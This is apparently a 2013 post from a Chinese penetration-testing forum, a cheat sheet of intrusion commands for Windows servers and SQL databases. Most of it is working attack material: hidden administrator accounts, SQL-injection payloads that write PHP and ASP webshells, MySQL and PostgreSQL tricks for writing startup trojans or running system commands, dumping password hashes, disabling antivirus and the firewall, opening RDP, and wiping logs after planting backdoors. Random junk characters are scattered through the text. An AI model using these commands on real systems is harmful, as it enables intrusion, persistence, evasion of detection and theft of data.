中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

---

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

1.net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
2.比较巧妙的建克隆号的步骤
先建一个user的用户
  V( @" P5 ]! M1 m3 ]* N' Y2 q' ~然后导出注册表。然后在计算机管理里删掉
在导入，在添加为管理员组
% E; ]) N' q& }3.查radmin密码
, V( x% b2 w9 W  J1 Preg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
建立一个"services.exe"的项
再在其下面建立(字符串值)
8 T* W$ n5 r. p* U6 q键值为mu ma的全路径
- w' s7 ?. [/ z1 e+ K; o( a# F5.runas /user:guest cmd
& o4 V! k( u8 `9 y测试用户权限！
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
5 y9 `! J+ E5 a! P$ m0 u* P7.入侵后漏洞修补、痕迹清理，后门置放：
! \" [4 I, C, `, ?. O基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
" H, U( v9 X+ i$ @" w8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example
  c% L& E0 t2 p6 ]$ u2 N6 n
% ?& U" D+ ]# c, s# Q. Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
8 u1 g# A6 O. \% K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'

9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
或者
- ^' i6 D- T; l+ g8 G3 ]1 F! T" gsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
& E# [8 z. A  d5 t2 Y来恢复cmdshell。

" t/ @7 W' T9 E分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10.xp_cmdshell新的恢复办法
" m+ a/ e5 H: ]/ G# Hxp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
/ i: h$ z$ C6 V* d( `dbcc addextendedproc ("sp_oacreate","odsole70.dll")
6 S" z- B3 T/ _& i% adbcc addextendedproc ("xp_cmdshell","xplog70.dll")
3 j- t5 A2 _, P
  L% k* g" b3 _( ^/ S这样可以直接恢复，不用去管sp_addextendedproc是不是存在
$ G) Q( ~, M$ Q7 n% _! ]- [
- |) Z0 z: @+ M$ ?# V1 e! J9 h-----------------------------
* @& {# s) `, ^& _% T" o. f
删除扩展存储过过程xp_cmdshell的语句:
6 [: o* L# X0 [  o, [6 ^$ _2 mexec sp_dropextendedproc 'xp_cmdshell'
' r4 L+ D% P: W. V1 C  A
. \5 I  Q$ W) ~% z/ P5 i0 V9 c恢复cmdshell的sql语句
$ Z1 b) h% j- R2 E/ Xexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
( q- V5 D$ n* n$ o( g
" g# E+ @) b: e! M4 }
1 ~' M! {2 U; w7 e开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 s0 `) A  ~1 ~8 P7 h
4 g. k6 R. S3 x. @, B7 u) T7 {$ }% s2 y判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 S: {9 _& K/ |' \0 g( u4 F6 S返回结果为1就ok
! E, u1 p; f7 `; ]
- r7 v5 j' g8 M1 B( w8 D/ C恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) S5 k9 J/ O4 k5 g返回结果为1就ok
! v" B. t- m! Y, U' ]
8 a" U% I. i' y+ F否则上传xplog7.0.dll
( t- o4 V' H& \exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: s: r9 R* i$ b' F) e: l
堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshel
-------------------------
清除3389的登录记录用一条系统自带的命令：
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
& d: t. {2 P$ M' C$ N! \% z
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
在 mysql里查看当前用户的权限
6 x, o5 ?  s# v" wshow grants for  

6 {6 f) P1 O! c以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。


' |! L# p' V5 \$ x! gCreate USER 'itpro'@'%' IDENTIFIED BY '123';
* J9 c0 s: r1 X4 A; i2 U/ i& ]0 K
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION

MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
4 \4 M; x$ B: ^) G
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

% _. r. a3 t! R, I# j  |$ l搞完事记得删除脚印哟。
0 K1 [, \/ r' P2 U
Drop USER 'itpro'@'%';
* h1 F! i6 H9 G9 Z
Drop DATABASE IF EXISTS `itpro` ;

- ]$ n. {" d: d' N- w当前用户获取system权限
: T9 o4 [  Y" y7 l% q0 v. q# Bsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
! z( g7 }1 Z, p5 O# _9 `8 K! L/ isc start SuperCMD
$ ]' e) ^% q( o* W6 x& O程序代码
3 `: x( [2 C, n/ Q4 b<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
& z* ?( q# i& F$ N! D: nos="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
- v# u  y5 q, ^! ?; s5 M) uSet oe=GetObject(os&"/Administrators,group")
$ {& i# z9 O# u- n) c6 m4 ISet od=ob.Create("user","nosec")
: i9 [. f: V$ H5 z6 rod.SetPassword "123456abc!@#"
od.SetInfo
' w, P1 T6 ]' ESet of=GetObject(os&"/nosec",user)
% d2 t7 n8 C: \& g: _% M) I" koe.add os&"/nosec"
6 ~* N8 |4 z, t; K. Y. j- y" i</Script>
<script language=javascript>window.close();</script>

4 }8 B, r9 b+ ~7 ^
% L9 ?0 s" _6 ^: C7 F; R
6 b8 h( \6 L" H
突破验证码限制入后台拿shell
程序代码
) x2 J9 f% Z, l( R& P! |" XREGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

7 ^6 T1 k5 ~, m3 Y9 w/ m保存为code.reg，导入注册表，重器IE
, C) A, ?9 h4 p. A' {( i4 Q就可以了
union写马
& ~, T% v  m; y* ~& m* j程序代码
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
' O( {$ F% d& _( ^9 a- L) Y# J9 Q7 ?
7 p: D5 }6 J- m) \+ l8 L0 Z应用在dedecms注射漏洞上,无后台写马
dedecms后台，无文件管理器，没有outfile权限的时候
在插件管理-病毒扫描里
5 x' f" N" \9 @写一句话进include/config_hand.php里
- @3 f* V3 M+ h2 H: z" \程序代码
>';?><?php @eval($_POST[cmd]);?>


如上格式
8 L4 G0 ^( }* Z4 q
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
2 J+ }" E0 x  T9 W9 |程序代码
3 F* z: u/ o8 y# m! C3 H+ Wselect username,password from dba_users;


mysql远程连接用户
$ s8 @8 v7 C8 O$ `4 {程序代码
; r$ i. F2 y" }/ Z. ?
# E& z' A9 U# {- bCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
0 |. c- \/ t# M0 {


0 c6 @$ _" N& l2 y
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
, ~7 s# a& C6 f1 l% `+ \5 q
1 i2 h. V$ _) ~2 B5 T1.查询终端端口

1 J9 B& R' w# \xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

8 M/ J8 H& e, Z# x7 H% _; z( d6 n4 p* a通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
, c0 `# G7 o; }type tsp.reg

6 z+ T4 S. o0 _; ^# X9 k2.开启XP&2003终端服务

4 a* d. D0 \+ g9 ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

4 E( ]; z4 f- {% R, Q" D
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
/ ?2 `  a. [5 h" o: C& u: }
3.更改终端端口为20008(0x4E28)
" y  S; _) e) B( O$ M$ w+ R
' H+ U1 c1 I  j# s; aREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
* ?# A  P4 A+ [+ [
+ i" D& E4 Q# e( G1 O, LREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
( d8 z' b4 o4 ]# [- w0 j+ l9 r

5.开启Win2000的终端，端口为3389(需重启)
! S7 x) }$ L# G4 J- C+ h
  ?5 E- d$ u, F+ secho Windows Registry Editor Version 5.00 >2000.reg
1 A/ I4 T( I( P9 gecho. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
* j' D  e; |/ a8 d  W2 g# V, Mecho "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
' F; V* v) N, }- zecho "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
9 @; J; }+ z: c: @  P( Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
1 |8 o/ }3 E0 c1 |2 D6 _! Qecho "Start"=dword:00000002 >>2000.reg
( I1 U4 N$ R0 Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
0 w) ]$ x7 ]: N( J4 R2 a9 b* v0 _! Lecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
; _- S: g5 d# v" ]" Jecho "Hotkey"="1" >>2000.reg
' ^& m. ~- W+ O  Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
) f/ D( Q. Y$ gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg

6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
% z3 b% d# Q% T/ P, I! l
! @% O7 Q( z$ @$ W6 }@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
8 w+ s0 Q( X+ f(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
/ I2 v: h* K" y3 I' h/ c) f
' S  ~5 `! \5 H+ d8 e) S
# x$ ]* t( q: [; r" y7.禁用TCP/IP端口筛选 (需重启)

6 A+ N/ c6 t  a4 D7 oREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命令来连接

' o5 C3 y8 F' n' F, e# n# d# _5 imstsc /v:ip:3389 /console
5 f& `5 P- U, t' ?  ]! R' n5 E
9.调整NTFS分区权限
0 n5 r4 S# k/ |6 I  n! F
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)

cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

; ?: n. ^5 _1 w! B9 Y; {- Y% z------------------------------------------------------
3389.vbs
) t1 I4 O2 N" Q) k7 XOn Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' c, X! p" y/ p$ v5 Q2 Yoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
% [- v+ |3 q1 gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# y& U* t' a3 e% t$ toreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
0 m' ]' P' s, y: c+ ~strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
2 z1 k  d; G& d" u7 K# b: hstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! n7 |- `- r: y/ ~* I5 O) BstrValueName = "ortNumber"
dwValue = 3389
" ^- E7 T9 \% a4 [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
3 Z4 j: n+ _) @# kstrValueName = "ortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 o- h. K* ]. a4 oSet R = CreateObject("WScript.Shell")
  {) n2 Q: M. b% KR.run("Shutdown.exe -f -r -t 0")

删除awgina.dll的注册表键值
程序代码
/ J( W4 a0 W6 G0 {6 y, w
4 e" x7 h, O2 i1 @# u. u# Lreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
6 h" G* ]( I3 G: ]# K* |: D3 E
$ W; P7 k8 |& `) R8 f% L) g+ g$ u3 L
4 n, N+ M1 T% }/ S5 s3 J+ }* g

* l2 b* N! {2 A: `程序代码
4 G3 W$ \& A# Z' k. vHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
" d( ]0 D1 a/ E/ u
* h! q/ I! ~( U" u9 @4 m设置为1，关闭LM Hash

7 U& e7 q# O% \+ ]# r数据库安全:入侵Oracle数据库常用操作命令
+ h2 A3 ~! [3 z最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
- c+ i) F" T# k* [) Y( ]1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
3、SQL>connect / as sysdba ;（as sysoper）或
connect internal/oracle AS SYSDBA ;(scott/tiger)
* R: j4 E" h% [conn sys/change_on_install as sysdba;
& x7 E/ C! G; \4、SQL>startup; 启动数据库实例
5、查看当前的所有数据库: select * from v$database;
select name from v$database;
" B: h, B5 t; k; s' t4 o2 F6、desc v$databases; 查看数据库结构字段
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
SQL>select * from V_$PWFILE_USERS;
6 f. i5 L$ ]3 K) N) |0 F: IShow user;查看当前数据库连接用户
8、进入test数据库：database test;
& J: r" E; |9 n5 J: e3 d9、查看所有的数据库实例：select * from v$instance；
3 X6 P1 g8 V: X- |9 e如：ora9i
10、查看当前库的所有数据表：
SQL> select TABLE_NAME from all_tables;
+ o( V- ~$ }+ Cselect * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
5 P+ u; [8 ]' Z& U7 y) C4 l, _# T_default_auditing_options_
11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
desc CQI.T_BBS_XUSER;
! E7 n. {+ [) I7 F- q13、获得CQI.T_BBS_XUSER表中的记录：
select * from CQI.T_BBS_XUSER;
14、增加数据库用户：(test11/test)
4 J" L5 Z1 O6 d3 P2 `+ ucreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
% R* X2 ?' H: ~, }& D7 g) B2 s15、用户授权:
grant connect,resource,dba to test11;
grant sysdba to test11;
7 _1 q" D  Z8 ?. \' P( C1 Icommit;
) _$ e% b$ n$ h16、更改数据库用户的密码：(将sys与system的密码改为test.)
alter user sys indentified by test;
: y) b. ~' R+ |) q9 L/ jalter user system indentified by test;
; z* U, E9 b) n7 F3 G. O# ^
& f6 g5 v0 l3 |0 z5 h9 yapplicationContext-util.xml
6 Z: r' i! x' lapplicationContext.xml
struts-config.xml
web.xml
8 V1 ^: Y( `* E  S, m! T  d2 Pserver.xml
tomcat-users.xml
: I6 Q" }) Q1 @" |3 D# `1 Bhibernate.cfg.xml
$ e# ~' t8 ]" d6 p" _- G' {0 Wdatabase_pool_config.xml
5 W, n  Z6 C- F* p

5 V# L& A5 n! m/ o) Q: I\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
9 R/ P" r, E% o8 E% ?% k5 R  u\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构
( g4 X* Z1 }' N4 L' h! x4 C
spring.properties 里边包含hibernate.cfg.xml的名称

: b; I* d: E" K  c7 P* t8 h
3 u" s2 {6 m: R7 h, s6 h; a. gC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

! a' T: o7 B: Z# \5 k) T如果都找不到  那就看看class文件吧。。
5 Y, d6 t0 O) l3 X6 E
测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
  ~; B  e% m4 D
测试2：
+ W8 A1 {1 j% B1 q3 ?8 Q* K
create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, L: {. a- M8 I. w3 t
1 k2 S2 e: o6 K1 ESELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
, J  i$ I2 M# [7 S7 L3 z
0 C' H% Q! V: z7 i, C+ J- K查看虚拟机中的共享文件：
在虚拟机中的cmd中执行
! a7 _! `5 M/ g. Q. A" S\\.host\Shared Folders

cmdshell下找终端的技巧
# e) i0 M% f  s4 f7 F! b找终端：
第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
/ G: j- y+ O1 K0 X0 g6 _9 X8 o　　 而终端所对应的服务名为：TermService
* g  ?6 K: M( @5 X4 ]& W第二步：用netstat -ano命令，列出所有端口对应的PID值!
　　 找到PID值所对应的端口
1 w* P( K$ E( q# X1 @. F, E3 m' i
. B, x9 p. O3 [, ?& W. t3 A) p, M查询sql server 2005中的密码hash
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ d" ^4 ]9 |/ x* s/ E2 Haccess中导出shell

中文版本操作系统中针对mysql添加用户完整代码：
0 W: Y- ?- {3 x% \# {5 b1 ?
use test;
" N6 a8 m8 w, t$ Z( wcreate table a (cmd text);
# S' L4 ^8 Q2 y1 U- qinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
% P7 e5 F4 M  c% P  D5 Finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
- E1 M, Q8 |5 {3 K0 n" @insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;
4 l" o( s' |1 P- m: h4 M* \
英文版本：
9 ~* r0 w+ _3 `. d# ?5 }& n0 T# |
use test;
% D. q% I- G3 v+ hcreate table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
" f5 u7 N. ~, j/ A8 |1 A- vinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;
4 N+ K; b3 O2 y. w$ x0 I# l; O
/ j4 Q& x4 s( d- k2 e4 ]6 Hcreate table a (cmd BLOB);
9 E9 g: U+ _" iinsert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
drop table a;

记录一下怎么处理变态诺顿
7 }/ z3 w( M8 k" j0 H$ x& q+ s查看诺顿服务的路径
sc qc ccSetMgr
然后设置权限拒绝访问。做绝一点。。
. l7 M& I' j( f3 Q& _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
* d: R/ A" u# \/ i# W- scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

0 V: k& e6 L" {8 b0 ?# X* Y1 a然后再重启服务器
" T  }  i# l* E1 ?0 ziisreset /reboot
这样就搞定了。。不过完事后。记得恢复权限。。。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
% `7 j5 w! B" p/ n1 Y% _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
; n# p& f$ b7 o2 g( z! U1 F/ |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
+ X1 B" k6 D9 V. t
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

postgresql注射的一些东西
如何获得webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
7 O( ~$ W  b4 V% xhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
/ Q& g' S) G& ~, y4 S! chttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
6 m$ y2 p& y8 a+ khttp://127.0.0.1/postgresql.php?id=1;select * from myfile;

z执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
6 w: W7 w3 c( l& j3 H- W当然，这些的postgresql的数据库版本必须大于8.X
4 p7 `8 Z- @. g/ |1 H创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

, m# C' I1 C- x& t( D8 ?* N创建一个输出表：
! ?/ S6 ^! \3 X9 ~CREATE TABLE stdout(id serial, system_out text)
, K& R" A# Z6 W/ ~( e! \4 A5 x
4 I: ]; S+ J* A  {# k  N0 G执行shell，输出到输出表内：
SELECT system('uname -a > /tmp/test')
% ~: e% J: K7 k6 r
/ M, o0 G1 T, u; o) @: ycopy 输出的内容到表里面；
COPY stdout(system_out) FROM '/tmp/test'
6 H4 b0 Y6 r7 V0 E) p
从输出表内读取执行后的回显，判断是否执行成功
& h. t8 S9 F+ Z* z2 q' v  |' L; y% h3 f
SELECT system_out FROM stdout
下面是测试例子
+ A4 f# S. l' d( b' n
- X: Q/ v: I4 [3 C1 Q1 G% D/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

8 v& P: `) q; y& w$ ?5 M( J/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --
; M2 w' M6 A1 y0 V& h2 U
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
1 N1 F/ a' |2 v5 d* P+ N
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
netsh firewall show      show/config default firewall
$ @- B6 F/ S0 unetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改
, |( |6 X: s8 l; K; h. H
* O, [/ _) Z) E+ ?/ H  s5 {[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
: o4 U$ s$ ~+ y( a/ U; WPortNumber值，默认是3389，修改成所希望的端口，比如6000

第二个地方：
5 w4 y8 l/ E) o/ J/ B[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
2 u9 ]' }5 e# d& kPortNumber值，默认是3389，修改成所希望的端口，比如6000
$ G. O# z0 W- D# l5 t5 ]! g! |; U. W
现在这样就可以了。重启系统就可以了

% x' E: T# h+ m& s2 w查看3389远程登录的脚本
9 m7 |. q* A" t保存为一个bat文件
7 [5 g4 B/ d! x  c/ C+ @date /t >>D:\sec\TSlog\ts.log
( V# ]# g! q- j! R0 m  O/ htime /t >>D:\sec\TSlog\ts.log
3 X, a9 e9 }- [netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
$ |' |! e" i6 i4 K' U
mstsc的参数：
$ Z5 e- z" k8 R/ H+ P( ]( _$ J
6 T& U2 n7 d: m, H" z远程桌面连接

0 e, _: {/ y9 c& O0 NMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
* @9 Y7 o+ c  R8 J" r
$ ~7 R) g& u6 D$ |9 x<Connection File> -- 指定连接的 .rdp 文件的名称。
% b1 z1 j; [, m4 {
